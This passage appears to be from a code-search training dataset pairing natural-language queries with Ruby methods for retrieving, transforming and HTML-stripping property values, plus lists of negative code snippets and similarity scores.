"0.6418566",
"0.6416862",
"0.6411512",
"0.64072675",
"0.63954943",
"0.63954943",
"0.6375698",
"0.6321739",
"0.6320056",
"0.6305459",
"0.6304524",
"0.6304524",
"0.6304524",
"0.6304524",
"0.6304524",
"0.6285069",
"0.62516344",
"0.62506187",
"0.6246287",
"0.6246287",
"0.6245358",
"0.6234482",
"0.62112623",
"0.61895984",
"0.61868876",
"0.6186877"
] | 0.67778647 | 11 |
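The setter above strips a trailing format extension before storing the URI; note that File.extname returns an empty string (never nil) when there is no extension, so the nil guard is purely defensive. An illustration, assuming a matching uri reader:

obj.uri = 'http://example.org/ontology/term.json'
obj.uri # => "http://example.org/ontology/term"

obj.uri = 'http://example.org/ontology/term'
obj.uri # => unchanged; no extension to strip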
Retrieves and transforms the property value | def get_property_value(value, is_url: false)
# Assume hash values are a type/value pair
if value.is_a?(Hash)
type = value['type']
value = value['value']
else
type = nil
end
# Apply transformations to string properties
value = transform(value, is_url: is_url) if value.is_a?(String)
# If a block is present, return the result of the block
return yield(value, type) if block_given?
# Otherwise return the value
value
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def value\n @property_hash[:value]\n end",
"def property(value)\n merge(property: value.to_s)\n end",
"def get_raw_property_value(name)\n return @property_values[name]\n end",
"def get_property(property)\n get_compound_value(get_value(property))\n end",
"def transform_property_value(value, value_type = nil, is_url: false)\n if is_url\n # Remove HTML-escaped encodings from URLs but avoid full HTML-stripping\n CGI.unescape_html(value)\n elsif STRIP_HTML\n # Strip HTML preserving block-level whitespace\n # - Loofah seems to preserve & " etc. so we remove these with CGI.unescape_html\n text = CGI.unescape_html(Loofah.fragment(value).to_text)\n # Collapse all runs of whitespace to a single space\n text.gsub!(/\\s+/, ' ')\n # Remove leading and trailing whitespace\n text.strip!\n # Return the transformed text\n text\n else\n # Return value as-is\n value\n end\n end",
"def property_converter\n FedoraValue\n end",
"def value\n\t\t# This bizarre construct is done in order to not be reliant\n\t\t# on the inherent assignment-order when using Property.new({...})\n\t\t# since that hash can be ordered anywhich way .daniel\n\t\tif value_id\n\t\t\tvalue_object.value\n\t\telse\t\t\t\n\t\t\t@value\n\t\tend\n\tend",
"def translate_property_value(key)\n return resource_translation_matrix.fetch(key) if resource_translation_matrix &&\n resource_translation_matrix.key?(key)\n\n key.to_s\n end",
"def value\n @casted_value ||= type_cast_value(@value)\n end",
"def value\n send property.type_field\n end",
"def get_property_value(value, is_url: false, &block)\n # Assume hash values are a type/value pair\n if value.is_a?(Hash)\n value_type = value['type']\n value = value['value']\n else\n value_type = nil\n end\n # Apply transformations to string properties\n value = transform_property_value(value, value_type, is_url: is_url) if value.is_a?(String)\n # Return the value or the result of calling the given block on the value\n block ? block.call(value, value_type) : value\n end",
"def map_value(converted_value:)\n calling_mapper.for(\n Property.new(\n value.subject,\n value.key,\n converted_value,\n value.adapter,\n value.resource\n )\n ).result\n end",
"def get\n @value\n end",
"def get(value)\n value\n end",
"def value\n attributes.fetch(:value)\n end",
"def get_value(property_path)\n element = @tree.select(property_path)[0]\n element.nil? ? nil : element.value\n end",
"def get_value(property)\n if @env_properties.get_value(property)\n return @env_properties.get_value(property)\n end\n @file_properties.get_value(property)\n end",
"def process_property\n property.strip!\n value.strip!\n\n self.value = Regexp.last_match(1) if value =~ %r{\\A\"(.*)(?<!\\\\)\"\\z}m\n\n section[property] = typecast(value)\n\n self.property = nil\n self.value = nil\n end",
"def get_value\n @value\n end",
"def get_value\n value\n end",
"def get_value\n value\n end",
"def value\n self.lazy_proc?(@value) ? self.coerce(@value.call) : @value\n end",
"def value\n @value ||= extract_value\n end",
"def make_valuestring\n\t\treturn self.value\n\tend",
"def property\n @property\n end",
"def transform(value)\n value\n end",
"def prop(field, name)\n value = nil\n unless field.nil?\n value = value_by_key(field, name)\n value = value&.html_safe if value.is_a?(String)\n end\n value\n end",
"def property_value(property_key, default_value=nil)\n prop=property(property_key)\n if default_value && property_key=='depth'\n # we're in SQALE.... Keep the text_value\n result = (prop ? prop.text_value : nil)||default_value\n else\n result = (prop ? prop.value : nil)\n unless result\n property_definition=java_definition.getWidgetProperty(property_key)\n result = WidgetProperty.text_to_value(property_definition.defaultValue(), property_definition.type().name()) if property_definition\n end\n end\n result\n end",
"def [](property_name)\n properties[property_name.to_s].value\n end",
"def get_property _property\n send_cmd(\"get_property #{_property}\")\n end",
"def result\n new_values = value.value.map do |val|\n map_value(converted_value: val)\n end\n CompositeProperty.new(new_values)\n end",
"def get\n val\n end",
"def get\n val\n end",
"def untypecasted_value\n read_attribute(:value)\n end",
"def value_for(field)\n value = instance_variable_get(:\"@#{field}\")\n value.nil? ? nil : value.to_s\n end",
"def get_property(property_name)\n value = get() and value[property_name]\n end",
"def get\n data[\"_value\"]\n end",
"def converted_value\n if @converter\n @converter.call(@value)\n else\n @value\n end\n end",
"def convert_property(key, value, direction)\n converted_property(primitive_type(key.to_sym), value, direction)\n end",
"def get_value\n @value \n end",
"def get_property_value(name)\n property = get_property(name)\n \n # Throw error if property doesn't exist\n if property.nil?\n raise StandardError.new(\"Property does not exist: #{name}\")\n end\n\n # Return the property value\n property.get_value(self)\n end",
"def record_value(record, property)\n case record\n when Hash\n record.fetch(property, record[property.field])\n when Resource\n property.get!(record)\n end\n end",
"def value\n parsed_value\n end",
"def value\n if @value\n @value\n else\n @value = resolve( :value )\n end\n end",
"def value\n self['value']\n end",
"def value!\n @value\n end",
"def raw_value\n @value\n end",
"def value\n return @value\n end",
"def value\n return @value\n end",
"def value\n return @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def value\n @value\n end",
"def convert_value(value)\n value\n end",
"def value\r\n @value\r\n end",
"def get_value(owner)\n raw_value = owner.get_raw_property_value(name)\n\n if raw_value.nil?\n return nil\n else\n case type\n when 'string' then raw_value\n when 'integer' then raw_value\n when 'decimal' then raw_value\n when 'length' then \"#{raw_value}px\"\n when 'color' then sprintf('#%06x', raw_value)\n when 'percent' then \"#{(raw_value*100).to_i}%\"\n end\n end\n end",
"def get_property(key)\n self.fetch key\n end",
"def value\n @attributes[:value]\n end",
"def value_raw\n @value\n end",
"def cast_value(value) # :api: public\n value\n end",
"def cast_value\n value.mongoize\n end",
"def value\n to_s\n end",
"def css_value(prop); end",
"def cast_as_value(as_type,as_property)\n if(as_type == :date)\n return \"XMLUtils.dateToXML(#{as_property})\"\n elsif(as_type == :datetime)\n return \"TolDateUtils.toTimeParam(#{as_property})\"\n else\n return as_property\n end\n end",
"def prop(name)\n properties.named(name).first.andand.value\n end",
"def value\n if allows_nil? && properties.values.all?(&:nil?)\n nil\n else\n Hash[properties.map { |key, value| [key, value.value] }]\n end\n end",
"def value\n typecast.present? ? typecasted_value : super\n end",
"def value\n return @val\n end",
"def field_value(field)\n @object.respond_to?(field) ? @object.send(field) : ''\n end",
"def get(property)\n self.send(property.to_sym)\n end",
"def transform_property_value(value)\n case value\n when /^0/\n # when it is a zero leading value like \"0777\" don't turn\n # it into a number (this is a mode flag)\n value\n when /^\\d+$/\n value.to_i\n when /(^(\\d+)(\\.)?(\\d+)?)|(^(\\d+)?(\\.)(\\d+))/\n value.to_f\n when /true/i\n true\n when /false/i\n false\n else\n value\n end\n end",
"def value\n to_type(@value)\n end",
"def get_property(name)\n $NEO_LOGGER.debug{\"get property '#{name}'\"}\n \n return nil if ! property?(name)\n value = @internal_node.get_property(name.to_s)\n if self.class.marshal?(name)\n Marshal.load(String.from_java_bytes(value))\n else\n value\n end\n end",
"def get_value\n read_attribute('text_value')\n end",
"def draw_property_value(html, value)\n if value.scalar?\n return html.h(value)\n elsif value.is_a?(HtmlOutput)\n return value.to_html(html)\n elsif value.is_a?(Tilia::Xml::XmlSerializable)\n # There's no default html output for this property, we're going\n # to output the actual xml serialization instead.\n xml = @server.xml.write('{DAV:}root', value, @server.base_uri)\n # removing first and last line, as they contain our root\n # element.\n xml = xml.split(\"\\n\")\n xml = xml[2, 2]\n return \"<pre>#{html.h(xml.join(\"\\n\"))}</pre>\"\n else\n return '<em>unknown</em>'\n end\n end",
"def value\n record.send(name).value\n end",
"def value\n self.send :\"#{_mapped_value_column}\"\n end",
"def get_property\n @xml = client.call(url).parsed_response.css('property').first\n @attributes.merge!(parse_xml_to_hash)\n end",
"def get_value name\n get name\n end",
"def __value(val)\n case val\n when Array\n # 4.1.1\n val.collect { |v| __value(v) }.join(',')\n when Hash\n # 4.1.1\n val.collect { |k, v| \"#{__property(k)}=#{__value(v)}\" }.sort.join(';')\n when true, false\n # 4.3.2\n val.to_s.upcase\n when Date\n # 4.3.4\n val.strftime('%Y%m%d')\n when Time\n # 4.3.5\n val.strftime('%Y%m%dT%H%M%S' + (val.utc? ? 'Z' : ''))\n else\n val.to_s\n end\n end",
"def normalize_scalar_property_value(value)\n return \"NaN\" if value.kind_of?(Float) && value.nan?\n\n case value\n when true, false, nil then value\n when ActiveSupport::Duration then value.to_i\n when Numeric then value\n when String then value.strip\n when Symbol then value.to_s.strip\n when Time then value.getutc.strftime(\"%Y-%m-%dT%H:%M:%S\")\n when IPAddr then value.to_s\n when FLOAT_INFINITY then \"+infinity\"\n when -FLOAT_INFINITY then \"-infinity\"\n when Array then\n out = value.map { |e| normalize_scalar_property_value(e) }\n out = :invalid_property_value if out.detect { |e| e == :invalid_property_value }\n out\n else :invalid_property_value\n end\n end",
"def get_value\n read_attribute('number_value')\n end",
"def value\n @value || ''\n end",
"def getter(attribute)\n willAccessValueForKey(attribute)\n value = send(\"primitive#{attribute.sub(/\\S/, &:upcase)}\")\n didAccessValueForKey(attribute)\n return value\n end",
"def value\n YAML::load(self[:value])\n end",
"def value\n YAML::load(self[:value])\n end",
"def property(name)\n get(\"/session/#{session_id}/element/#{element_id}/property/#{name}\").value\n end",
"def value\n `#{@el}.value`\n end",
"def transmogrified_value\n case param.field.options[:value_transmogrification]\n when :chronic\n Chronic.parse(value, :context => :past)\n when :chronic_date\n v = Chronic.parse(value, :context => :past)\n v ? v.to_date : nil\n when :upcase\n value.upcase\n when :downcase\n value.downcase\n else\n value\n end\n end",
"def transform_property_value(value)\n case value\n when /^0/\n # when it is a zero leading value like \"0777\" don't turn\n # it into a number (this is a mode flag)\n value\n when /^\\d+$/\n value.to_i\n when /(^(\\d+)(\\.)?(\\d+)?)|(^(\\d+)?(\\.)(\\d+))/\n value.to_f\n when /true/i\n true\n when /false/i\n false\n else\n value\n end\n end",
"def process_field_value(value)\r\n value\r\n end",
"def _property(p_name)\n __t_stringish(p_name)\n _jinja.properties[__attribute_key(p_name)]\n end",
"def get_value_from(message_field)\n return if message_field.nil?\n\n message_field.public_send(*field_value)\n end",
"def value(key)\n if self[key].present?\n self[key].class != ActiveSupport::TimeWithZone ? self[key] : self[key].to_f\n elsif self[:parameters].present? && self[:parameters][key].present?\n return self[:parameters][key]\n elsif self[:extras].present? && self[:extras][key].present?\n return self[:extras][key]\n else\n return \"\"\n end\n end"
] | [
"0.75339127",
"0.7162885",
"0.71099174",
"0.70154476",
"0.685727",
"0.67887443",
"0.6724902",
"0.66939205",
"0.66882795",
"0.667826",
"0.66344774",
"0.66299194",
"0.6599992",
"0.6543717",
"0.64816314",
"0.64649594",
"0.6449784",
"0.64259946",
"0.6421008",
"0.6410926",
"0.6410926",
"0.6386912",
"0.6373667",
"0.63613725",
"0.63599634",
"0.63556623",
"0.63243145",
"0.6312526",
"0.6302927",
"0.6268681",
"0.62682235",
"0.6266577",
"0.6266577",
"0.62570333",
"0.6236405",
"0.61907846",
"0.61847293",
"0.61785424",
"0.6169909",
"0.61609614",
"0.6150107",
"0.61319196",
"0.61240804",
"0.6118758",
"0.6081182",
"0.6079602",
"0.607641",
"0.60684127",
"0.60684127",
"0.60684127",
"0.605219",
"0.605219",
"0.6051788",
"0.6051788",
"0.6051788",
"0.6051788",
"0.6051788",
"0.6051788",
"0.6051788",
"0.60354036",
"0.60326517",
"0.60249734",
"0.6010879",
"0.60034233",
"0.5983072",
"0.5983043",
"0.59821606",
"0.59812874",
"0.597666",
"0.59727526",
"0.59669155",
"0.59572625",
"0.595708",
"0.5947796",
"0.59469056",
"0.5943114",
"0.59406716",
"0.59389585",
"0.5937266",
"0.59251165",
"0.5924335",
"0.5920796",
"0.5913221",
"0.58872056",
"0.5886505",
"0.5885968",
"0.58817035",
"0.58812946",
"0.58787566",
"0.5876831",
"0.5875537",
"0.5875537",
"0.5869977",
"0.5865699",
"0.5857425",
"0.58498996",
"0.5834551",
"0.58339036",
"0.5821632",
"0.58181846"
] | 0.68610126 | 4 |
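The unwrapping and block protocol of get_property_value compose with the HTML-stripping transform (which appears as the next record's document) roughly like this, assuming STRIP_HTML is enabled:

get_property_value({ 'type' => 'literal', 'value' => '<b>Hello</b> world' })
# => "Hello world" -- the hash is unwrapped, then transform strips the markup

get_property_value('x') { |value, type| [value, type] }
# => ["x", nil] -- the block receives the unwrapped value and its type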
Removes HTML markup from property values | def transform(value, is_url: false)
if is_url
# Remove HTML-escaped encodings from URLs without full HTML-stripping
CGI.unescape_html(value)
elsif STRIP_HTML
# Strip HTML preserving block-level whitespace
# - Loofah seems to preserve & " etc. so we remove these with
# CGI.unescape_html
text = CGI.unescape_html(Loofah.fragment(value).to_text)
# Collapse all runs of whitespace to a single space
text.gsub!(/\s+/, ' ')
# Remove leading and trailing whitespace
text.strip!
# Return the transformed text
text
else
# Return value as-is
value
end
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def draw_property_value(html, value)\n if value.scalar?\n return html.h(value)\n elsif value.is_a?(HtmlOutput)\n return value.to_html(html)\n elsif value.is_a?(Tilia::Xml::XmlSerializable)\n # There's no default html output for this property, we're going\n # to output the actual xml serialization instead.\n xml = @server.xml.write('{DAV:}root', value, @server.base_uri)\n # removing first and last line, as they contain our root\n # element.\n xml = xml.split(\"\\n\")\n xml = xml[2, 2]\n return \"<pre>#{html.h(xml.join(\"\\n\"))}</pre>\"\n else\n return '<em>unknown</em>'\n end\n end",
"def html_safe_value\n sanitize(@values.join(' '), tags: %w[sub sup i em])\n end",
"def transform_property_value(value, value_type = nil, is_url: false)\n if is_url\n # Remove HTML-escaped encodings from URLs but avoid full HTML-stripping\n CGI.unescape_html(value)\n elsif STRIP_HTML\n # Strip HTML preserving block-level whitespace\n # - Loofah seems to preserve & " etc. so we remove these with CGI.unescape_html\n text = CGI.unescape_html(Loofah.fragment(value).to_text)\n # Collapse all runs of whitespace to a single space\n text.gsub!(/\\s+/, ' ')\n # Remove leading and trailing whitespace\n text.strip!\n # Return the transformed text\n text\n else\n # Return value as-is\n value\n end\n end",
"def value_html\n options[:catalog] ? '' : attribute_value_to_html(Array.wrap(values).first)\n end",
"def to_html\n map { |key, value|\n if value.is_a?(Hash)\n value.map { |k,v| %(#{key_to_attr_name(key)}-#{attribute_html(k, v)}) }.join(' ')\n else\n attribute_html(key, value)\n end\n }.join(' ')\n end",
"def strip_tags\n %w(name description allowed_values).each do |a|\n next if send(a).blank?\n self.send \"#{a}=\", send(a).gsub(/\\<.*?\\>/, '')\n end\n true\n end",
"def strip_tags\n %w(name description allowed_values).each do |a|\n next if send(a).blank?\n self.send \"#{a}=\", send(a).gsub(/\\<.*?\\>/, '')\n end\n true\n end",
"def strip_tags\n %w(name description allowed_values).each do |a|\n next if send(a).blank?\n self.send \"#{a}=\", send(a).gsub(/\\<.*?\\>/, '')\n end\n true\n end",
"def strip_html_from_description\n self.description = ActionView::Base.full_sanitizer.sanitize(description)\n end",
"def remove_alt_text(value)\n @children['alt-text'][:value].delete(value)\n end",
"def page_meta_escape_value(val)\n val.to_s.gsub(\"<\", \"<\").gsub(\">\", \">\")\n end",
"def set_NoHTML(value)\n set_input(\"NoHTML\", value)\n end",
"def clean_attribute(val)\n val.to_s.delete(\"\\n\").gsub(' ', '%20')\n end",
"def html\n value['Html']\n end",
"def sanitize_inputs\n attributes.each do |attr_name, attr_value|\n next unless attr_value.is_a? String\n self[attr_name] = strip_markup attr_value\n end\n end",
"def sanitize_product!(product)\n product.cms_text = sanitize_html(product.cms_text)\n product.description = sanitize_html(product.description)\n product.product_properties.each do |pp|\n pp.value = sanitize_html(pp.value)\n end unless product.product_properties.nil?\n end",
"def to_html(html)\n tmp = value.map do |value|\n html.h(value)\n end\n tmp.join(', ')\n end",
"def h obj; obj.to_s.html_escape end",
"def display_property_details(separator = '<br/>')\n property_details.join(separator)\n end",
"def transform_attr(key, value)\n if value.is_a? Array\n sub_attrs = value.map do |sub_prop|\n sub_prop.map { |k, v| transform_attr(k, v) }\n end\n \"<w:#{key}>#{sub_attrs.join}</w:#{key}>\"\n elsif value.is_a? Hash\n props = value.map { |k, v| format('w:%s=\"%s\"', k, v) if v }\n \"<w:#{key} #{props.compact.join(' ')} />\"\n else\n value = format('w:val=\"%s\" ', value) if value\n \"<w:#{key} #{value}/>\"\n end\n end",
"def transform_attr(key, value)\n if value.is_a? Array\n sub_attrs = value.map do |sub_prop|\n sub_prop.map { |k, v| transform_attr(k, v) }\n end\n \"<w:#{key}>#{sub_attrs.join}</w:#{key}>\"\n elsif value.is_a? Hash\n props = value.map { |k, v| format('w:%s=\"%s\"', k, v) if v }\n \"<w:#{key} #{props.compact.join(' ')} />\"\n else\n value = format('w:val=\"%s\" ', value) if value\n \"<w:#{key} #{value}/>\"\n end\n end",
"def display_property_details(separator = '<br/>')\n property_details.join(separator)\n end",
"def html_value\n \"TODO: html_value for #{name}\"\n end",
"def html_safe\n self\n end",
"def markup\n if tag?\n @value.raw\n elsif @value.instance_variable_defined?(:@markup)\n @value.instance_variable_get(:@markup)\n end\n end",
"def to_xhtml()\n nil\n end",
"def share_description(value) \n raw(value).gsub(\"<br>\", \" \").gsub(\"<br />\", \" \")\n end",
"def share_description(value)\n raw(value).gsub(\"<br>\", \" \").gsub(\"<br />\", \" \")\n end",
"def sanitize_attributes\n %w(author title description keyword).each do |field|\n self.send(\"#{field}=\",HTMLEntities.new.decode(self.send(field)))\n end\n end",
"def format_value(value)\n value.is_a?(String) ? value.gsub(\"\\u0000\", '') : value\n end",
"def clean_content\n self.content = content.gsub('<p> </p>', '') if content\n end",
"def to_html\n __html__.dup.scrub!(:escape).to_html\n end",
"def to_html(html)\n tmp = value.map do |value|\n html.xml_name(value)\n end\n tmp.join(', ')\n end",
"def show_val(value,\n str_if_empty='____',\n value_style='form_data',\n prefix='',\n suffix='',\n prefix_style='field_label')\n value_style = 'form_data' if value_style.blank?\n isblank = value.blank?\n if isblank && str_if_empty=='suppress'\n return ''\n end\n value = str_if_empty if isblank\n s = ''\n s << \"<span class='#{prefix_style}'>\" + prefix + \"</span>\" unless prefix.blank?\n s << \"<span class='#{value_style}'>#{value}</span>\"\n if (!isblank) && (!suffix.blank?) && (suffix != value.to_s[-1,1])\n s << suffix\t#\tAppend suffix if it not already the last character in the string (e.g., avoids double periods)\n end\n return s.html_safe\n end",
"def strip_html_tags!\n @raw.gsub!(/<[^>]+?>/, ' ')\n end",
"def attribute_value_to_html(value)\n ::Deepblue::LoggingHelper.bold_debug [ ::Deepblue::LoggingHelper.here,\n ::Deepblue::LoggingHelper.called_from,\n \"value=#{value}\",\n \"\" ] if doi_attribute_renderer_debug_verbose\n rv = ::Deepblue::DoiBehavior.doi_render value\n return rv\n end",
"def prop(field, name)\n value = nil\n unless field.nil?\n value = value_by_key(field, name)\n value = value&.html_safe if value.is_a?(String)\n end\n value\n end",
"def reverse_html_tags\n self.gsub('<', \"<\").gsub('>', \">\")\n end",
"def to_html(_options = {})\n ''\n end",
"def plain_html\n self.class.to_html.to_html(text.dup)\n end",
"def interpolated_markup\n visualization.markup.tap do |markup|\n interpolation_values.each do |k,v|\n markup.gsub!(\"__#{k.upcase}__\", v.to_s)\n end\n end\n end",
"def indicate_when_missing(value = nil) \n value.blank? ? \"—\" : value\n end",
"def textilize_without_paragraph(do_object_links=false)\n textilize(do_object_links).sub(/\\A<p[^>]*>(.*?)<\\/p>.*/m, '\\\\1')\n end",
"def html(cell_value)\n apply_format(cell_value, format, option).to_s\n end",
"def sanitize\n # ui_enabled only for the belongs_to, has_many and many_to_many types\n self.ui_enabled = nil unless self.is_relationship?\n\n # text_formatting only for the text type\n self.text_formatting = nil unless self.type == :text\n end",
"def to_html\n map { |x| x.output(\"\") }.join\n end",
"def purge_custom_tags(options)\n options.reject{ |key,value| [:label, :html, :field, :field_type, :separator].include?(key.to_sym) }\n end",
"def c(value)\n\tc_value = value.gsub(\"\\n\\n\",\"<paragraph></paragraph>\")\n\tc_value = c_value.gsub(\"`\",\"'\")\n\treturn c_value\nend",
"def method_missing(*attributes)\n if (attributes[0][/_safe$/])\n html_safe_string = send(attributes[0].to_s.gsub(/_safe$/,\"\").intern).html_safe\n CGI::unescapeElement( CGI::escapeHTML(html_safe_string), \"BR\" )\n else\n super\n end\n end",
"def process_property\n property.strip!\n value.strip!\n\n self.value = Regexp.last_match(1) if value =~ %r{\\A\"(.*)(?<!\\\\)\"\\z}m\n\n section[property] = typecast(value)\n\n self.property = nil\n self.value = nil\n end",
"def clean_value\n if (type == :string || type == :text) && !Axlsx.trust_input\n Axlsx.sanitize(::CGI.escapeHTML(@value.to_s))\n else\n @value.to_s\n end\n end",
"def dumpAsString\n\t\tmarkup = \"\"\n\t\t@Value.each do |line|\n\t\t\tmarkup += \"#{line}<br />\\n\"\n\t\tend\n\t\treturn markup\n\tend",
"def to_s\n return content unless node?\n props = properties || {}\n html = props.collect{ |key, value| '%s=\"%s\"' % [key, value] }\n attrs = \"\" \n attrs = (\" \" << html.join(\" \")) unless html.empty?\n \n if SELF_CLOSING_TAGS.include?(node)\n return \"\" unless attrs.strip.blank?\n \"<%s%s />\" % [node, attrs]\n else\n \"<%s%s>%s</%s>\" % [node, attrs, content, node]\n end\n end",
"def to_html\n diff(@old, @new, @fields).reduce({}) do |diffed_output, (key, val)|\n if val.class == Hash\n diffed_output[key] = val.reduce({}) do |d_o, (k, v)|\n d_o[k] = v.to_s :html\n d_o\n end\n else\n diffed_output[key] = val.to_s :html\n end\n diffed_output\n end\n end",
"def formatted_value_string(value)\n return value unless value.to_s.include?(\"\\n\") || value.to_s.include?(\"\\302\")\n\n # replaces all of \\n with a break line, but make sure it is escaped before marking as safe\n value = ERB::Util.html_escape(value)\n value.gsub!(\"\\n\", '<br>')\n value.html_safe # rubocop:disable Rails/OutputSafety\n end",
"def sanitize_attributes\n # Summary, content are sanitized with an HTML sanitizer, we want imgs etc to be present.\n # Other attributes are sanitized by stripping tags, they should be plain text.\n self.content = Sanitizer.sanitize_html self.content\n self.summary = Sanitizer.sanitize_html self.summary\n\n self.title = Sanitizer.sanitize_plaintext self.title\n self.author = Sanitizer.sanitize_plaintext self.author\n self.guid = Sanitizer.sanitize_plaintext self.guid\n self.url = Sanitizer.sanitize_plaintext self.url\n end",
"def strip_html(param_string)\n param_string.gsub!('<', '<')\n param_string.gsub!('>', '>')\n param_string.gsub(/\\\"/,\""\")\n return param_string\n end",
"def html_attributes(attr)\n return '' if attr.empty?\n\n attr.map do |k, v|\n v.nil? || (k == 'id' && v.strip.empty?) ? '' : \" #{k}=\\\"#{escape_html(v.to_s, :attribute)}\\\"\"\n end.join('')\n end",
"def html_value\n result = value.sub /^CL\\:/, '<b>Classifiers:</b> '\n result.gsub /\\[\\[(.*?)\\]\\]/ do |reference|\n values = $1\n pinyin = (values =~ /\\<.*\\>/) ? values.split('<')[1].sub('>', '') : ''\n values = values.sub(\"<#{pinyin}>\", '').split('|')\n traditional, simplified = values.count == 2 ? values : ['', values[0]]\n \"<span class='definition_link'><a href='/dictionary/find?simplified=#{simplified}&traditional=#{traditional}&pinyin=#{pinyin}'>#{simplified}#{'('+pinyin+')' if pinyin}</a></span>\"\n end\n end",
"def as_displayed\n strip_html.unescape_html.strip_squeeze\n end",
"def textilize_without_paragraph(do_object_links=false, sanitize=true)\n textilize(do_object_links, sanitize).sub(/\\A<p[^>]*>(.*?)<\\/p>.*/m, '\\\\1')\n end",
"def process\n @properties.map { |k, v| transform_attr(k, v) }.join\n end",
"def process\n @properties.map { |k, v| transform_attr(k, v) }.join\n end",
"def html_escape\n return to_s\n end",
"def html_escape\n return to_s\n end",
"def to_propertyfile_escaped_s\n to_s.to_propertyfile_escaped_s\n end",
"def to_propertyfile_escaped_s\n to_s.to_propertyfile_escaped_s\n end",
"def to_s(attributes = nil)\r\n assert_exists\r\n hash_properties = {\"text\"=>\"innerHTML\"}\r\n hash_properties.update(attributes) if attributes != nil\r\n r = super(hash_properties)\r\n #r = string_creator\r\n #r += span_div_string_creator\r\n return r.join(\"\\n\")\r\n end",
"def clean_field(value)\n doc = Nokogiri::XML.fragment(value)\n doc.text.squish\n end",
"def to_s\n if revealed?\n value.to_s\n else\n \" \"\n end\n end",
"def remove_whitespace\n self.attributes.each { |key, value| self[key] = value.strip if value.respond_to?(:strip) }\n end",
"def html_attributes(attr); end",
"def html_attributify\n downcase.gsub(/[_\\/\\s]/, \"-\").gsub(/[^0-9a-z\\-]+/, \"\")\n end",
"def orphan str\n \"#{tagify(:p, {}, str.to_s.strip)}\"\n end",
"def sanitize_details\n self.details = ActionController::Base.helpers.sanitize(details, { :tags => ALLOWED_HTML_TAGS_IN_DETAILS } )\n end",
"def sanitize_css_declaration_value(property, value)\n clean = \"\"\n property.downcase!\n if property == \"font-family\"\n if !sanitize_css_font(value).blank?\n # preserve the original capitalization\n clean = value\n end\n elsif property == \"content\"\n clean = sanitize_css_content(value)\n elsif value.match(/\\burl\\b/) && (!ArchiveConfig.SUPPORTED_CSS_KEYWORDS.include?(\"url\") || !%w(background background-image border border-image list-style list-style-image).include?(property))\n # check whether we can use urls in this property\n clean = \"\"\n elsif property.match(/#{ArchiveConfig.SUPPORTED_CSS_SHORTHAND_PROPERTIES.join('|')}/)\n clean = tokenize_and_sanitize_css_value(value)\n elsif ArchiveConfig.SUPPORTED_CSS_PROPERTIES.include?(property)\n clean = sanitize_css_value(value)\n end\n clean.strip\n end",
"def sanitize_metadata\n return unless metadata_changed?\n sanitizers = {\n 'title' => [:html_entities],\n 'notes' => [:html, :css],\n 'endnotes' => [:html, :css],\n 'summary' => [:html]\n }\n sanitizers.each do |field, sanitizers|\n value = metadata[field]\n next if value.blank?\n self.metadata[field] = sanitized_value(value, sanitizers)\n end\n sanitize_associations\n end",
"def evaporate\n self.gsub(/\\s/, '')\n end",
"def inline_html(opts)\n opts[:text] || \"\"\n end",
"def default_input_html; {} end",
"def to_html; end",
"def escape_html_fields\n @entity_config.each do |key, entity_config|\n entity_val = @params[key.to_sym]\n next if entity_val.blank?\n r = escape_html_fields_recursively(entity_val, entity_config)\n @params[:form_data][key.to_sym] = r\n @params.delete(key)\n end\n end",
"def escape_html(value)\n CGI.escapeHTML(value)\n end",
"def markup\n self.text.sub(/^(.*)$/,'<b>\\1</b>')\n end",
"def xml_attr_escape\n replacements = {\"<\" => \"<\", \">\" => \">\", \"&\" => \"&\", \"\\\"\" => \""\", \"'\" => \"'\"}\n gsub(/([<>&\\'\\\"])/) { replacements[$1] }\n end",
"def sanitize_as_html!\n Engine.clean!(self)\n end",
"def sanitize_as_html!\n Engine.clean!(self)\n end",
"def proptext(name) #:nodoc:\n prop = @properties.detect { |f| f.name? name }\n if prop\n prop = prop.to_text\n end\n prop\n end",
"def text\n html.gsub(REGEX_TAGS, \"\")\n end",
"def unstarred\n '☆'\n end",
"def sanitize_data(value)\n HtmlSanitizer.sanitize(value)\n end",
"def cleanup_newlines\n [:description, :use].each do |field|\n self[field].gsub!(/\\r\\n/, \"\\n\") if self[field]\n end\n end",
"def sanitize(text)\n text.gsub('<', '<').gsub('>', '>')\n end",
"def no_tags label\n return label.gsub(/\\<.+\\/?\\>/,'')\n end",
"def to_html(options = {})\n \"\"\n end",
"def populate_properties_from(element)\n self.class.properties.each do |p|\n if element.has_element?(p)\n val = element.element(p).value\n unless val.nil? \n val = val.to_s.to_created_time if self.class.timestamps.include? p\n val = val.to_s.strip_html if p.to_s == 'source' && !val.to_s.empty?\n unless block_given? && p.to_s == 'text'\n val = HttpUtility.html_decode val if p.to_s == 'text'\n self.send(\"#{p}=\".to_sym, val) \n else\n yield val\n end\n end\n end\n end\n end",
"def render_value(value)\n value.kind_of?(Class) ? value.inspect : value\n end",
"def to_html\n #FIXME refactor with to_s\n out = ''\n self.metadata.each{|k,v| out << \"<p>\\n<b>#{k}</b>: #{v}\\n</p>\\n\"}\n out << \"--------------------\\n\"\n self.steps.each{|s| out << s.to_html }\n out\n end",
"def _(data=\"\"); self.__ self.escape_html(data.to_s); end",
"def tag_attributes(options)\n return '' unless options\n options.inject('') do |all,(key,value)|\n next all unless value\n all << ' ' if all.empty?\n all << if value.is_a?(Hash)\n nested_values(key, value)\n elsif BOOLEAN_ATTRIBUTES.include?(key)\n %(#{key}=\"#{key}\" )\n else\n %(#{key}=\"#{escape_value(value)}\" )\n end\n end.chomp!(' ')\n end",
"def to_xhtml(options = T.unsafe(nil)); end"
] | [
"0.65004545",
"0.6416042",
"0.62413484",
"0.6210583",
"0.6144749",
"0.5946043",
"0.5946043",
"0.5946043",
"0.590286",
"0.58979213",
"0.5865639",
"0.5843693",
"0.5795531",
"0.5794074",
"0.5786897",
"0.5749199",
"0.5747145",
"0.5703195",
"0.5694222",
"0.5691464",
"0.5691464",
"0.56615114",
"0.56614107",
"0.5634138",
"0.56003827",
"0.55944204",
"0.5581133",
"0.5563171",
"0.55595833",
"0.5532139",
"0.5523721",
"0.5514901",
"0.5512192",
"0.54859114",
"0.5449333",
"0.5447177",
"0.54388696",
